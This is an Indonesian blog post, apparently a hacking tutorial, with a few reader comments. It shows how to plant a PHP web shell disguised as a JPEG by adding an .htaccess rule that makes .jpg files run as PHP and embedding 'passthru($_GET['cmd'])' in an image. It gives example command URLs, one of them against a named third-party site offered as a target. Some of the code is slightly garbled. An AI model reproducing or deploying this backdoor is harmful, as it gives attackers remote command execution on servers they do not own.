OK langsung saja,....
tambahkan kode berikut pada file .htaccess jika filenya tidak ada maka buatlah :p
lalu ambil sebuah gambar yang ber-ekstensi .jpeg atau .jpg lalu masukkan kode berikut pada gambar tadiAddType application/x-httpd-php .jpg
dan upload satu direktori dengan file .htaccess
passthru($_GET['cmd']); ?>
sekarang coba bukalah URL tempat file image tadi berada,
contoh :
http://example.com/images/logo.jpg?cmd=net%20user
sebagai contoh lain saya mengambil target yang dipinjamkan oleh Om Oghie
http://www.harvesthowl.org/test.jpg?cmd=dir
Referensi :
http://www.google.co.id
http://itsecuritylab.eu/
4 comments:
keren tutornya kk
@oGHie : makasih kaka udah mampir dan makasih juga buat shell nya :D
mantap gan ...sukses selalu ...
Nitip ya: http://peace-reggae.blogspot.com/
mantap.
Post a Comment